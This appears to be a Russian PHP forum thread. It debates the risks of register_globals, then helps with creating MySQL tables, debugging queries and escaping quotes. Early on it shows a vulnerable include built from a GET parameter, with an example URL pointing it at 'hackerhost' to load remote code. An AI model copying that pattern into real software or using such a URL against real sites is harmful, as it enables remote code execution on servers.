Угу.. по ошибке...
интересно а как он окажется не проинициализированным
ведь тогда будет пустое значение.

тоесть эта переменная должна или передаватся скрипту - или устонавливатся в нем.
если передоватся - то надо делать проверки на содержание

и ваще так никто не делает
когда передается параметр такой
проще передавать id
тоесть чтото типа
Global $id;
$root[1]="";
$root[2]="";
........
$root[n]="";
include $root[id]."/library.php";

короче невижу проблеммы...
и чтото я не вижу принипиальной разницы с

$root = $_GET['root'];
include $root."/library.php";

http://example.com/script.php?root=http://hackerhost


artefacts = array();
artefacts['rabbit'] = "white";

ну эт более показательный пример.
но тут уже просто есть правила пограмирования
создание массива(в сях это какраз выделение памяти и т.д.) и потом его наполнение

вывод
если не умеете програмить - тогда глобался надо закрывать.
на мой взгляд.

Nec

Неверно. Если по каким-то причинам (а такое было возможным - уверяю вас) будет пропущена операция присваивания переменной значения, то в таблицах интерпретатора ее не будет вообще. И в таком случае возможна подмена ее с пом. глобальных. Как я уже сказал - в сложных сценариях, насчитывающие несколько файлов, включающих друг друга, уследить за глобальными переменными очень трудно.

Первый пример уязвимости - такая ошибка, как я уже сказал, неоднократно обнаруживалась и устранялась в этом самом форуме - phpBB.
Второй - тут же, в версии 2.0.8
Уже говорилось на пред. странице.

Ну, идите тогда к разработчикам этого форума, и говорите, какие они глупые, совсем не умеют программировать.

Вообще говоря - PHP это вам не Си. Сишная практика программирования тут мало применима. За всем здесь уследить довольно трудно.

register_globals = off

1). Более безопастно, невозможно больше определить глобальную переменную просто так, так как они определяются теперь в специальных суперглобальных массивах $_POST и $_GET, а так же $_SERVER, $_SESSION, $_COOKIE
2). Так как на каждый вид переменных свой масив, не появляется что в сессии, POST, GET и.т.д. совпадут имена переменных Очевидный плюс.
3). Логика хранения переменных удобна и ясна. ненадо вспоминать что это за переменная - кукис. сессия или с post запроса, это видно наглядно.

Не в опыте дело, не ошибается только тот кто ничего не делает

Здравствуйте, это снова я
Помогите плз. с этим

Там писали про версию с IRC сервером и WEB, думаю вполне подойдёт. А вообще чат обычно требует демона запущенного, что само по себе требудет больше чем просто Apache + PHP + MySQL. Частенько это делают на Perl/TCL/C/C++. Так же очень трезвая мысль была по поводу Java аплета Это идиальный вариант на мой взгляд. Поищи поиском какие нить чаты, по форумам почитай. Я лично не ставил ниразу.

Помогите пожалуйста.
Не могу понять, как с помощью PHP в базе данных (MySQL) создать табличку? Задумался тут, на досуге...
Строка типа - $crtable = mysql_query("create table users (id_user in(6) not null auto_increment, login text, primary key (id_user))type=myisam");" не проходит по известной причине. Функция mysql_query поддерживает только эти запросы - SELECT, SHOW, EXPLAIN, DESCRIBE...
Может в PHP функция есть для этого, которой я просто не знаю???
Или решения вообще нет и придётся каждую новую табличку вручную создавать??? Хотя, это абсурд...

Это над вами пошутили или вы сами головой ударились ?
Функция mysql_query поддерживает всё (если конечно никто в правах доступа к базе не копался)

Ой, точно точно, я сам ударился...

Может кто-нибудь тогда приведёт код с использованием функции mysql_query для создания таблицы в БД. А то у меня из консоли всё получается, а через mysql_query нет...

Возможно у тебя с правами доступа в базе что-то не то....

Разобрался я в чём дело было... Ошибка синтаксиса...

Ну это я тебе тоже поправил, просто не упомянул )) И вообще, есть такая функция, mysql_error(); называется

Угу. При отладке полезно пользоваться конструкцией вида:

Сразу все встает на свои места, если что не так

Кстати советик всем "мега-спецам"
Если вы программируете не так давно то лучше предусмотреть DEBUG_MODE, т.к это предотвратит подобные "детские" ошибки

Делается это примерно так...

Вставлять отладочный код после каждого запроса тож не есть гуд... Если в файле под 1к строк - намучаешься...
Я себе класс небольшой написал, а в нем такое:

Юрий Для тех кто за РНР сел недавно код в 50 строк (с парой запросов к БД) уже достижение...
(а более опытные и сами знают как им дебугить)

прально
А вообще лично я себе написал целый класс для работы с базой данных и им пользуюсь вовсю, и дебагинг встроенный по принципу true/false, и прочие удобства

_Psih
Это не единственная процедура в моем классе

Просвяти что это такое...

примерно так

Ясно...
Кстати народ, давайте перейдем к более продвинутым вопросам. Кто как решает проблемы с обработкой кавычек прежде чем положить данные в БД? То что надо контролировать magic_quotes и проч. можете не объяснять. Я просто тут попал в ситуацию... слеширую вход исходя из настроекк ... у меня ошибки в форуме только средствами php обрабатываются, соотв. если у меня в форме была ошибка данные уже в прослешированном виде уходят опять в форму. Сейчас-то мне проще шаблонизатор поправить конечно Хоть и криво, но смогу показать, а позже переделаю.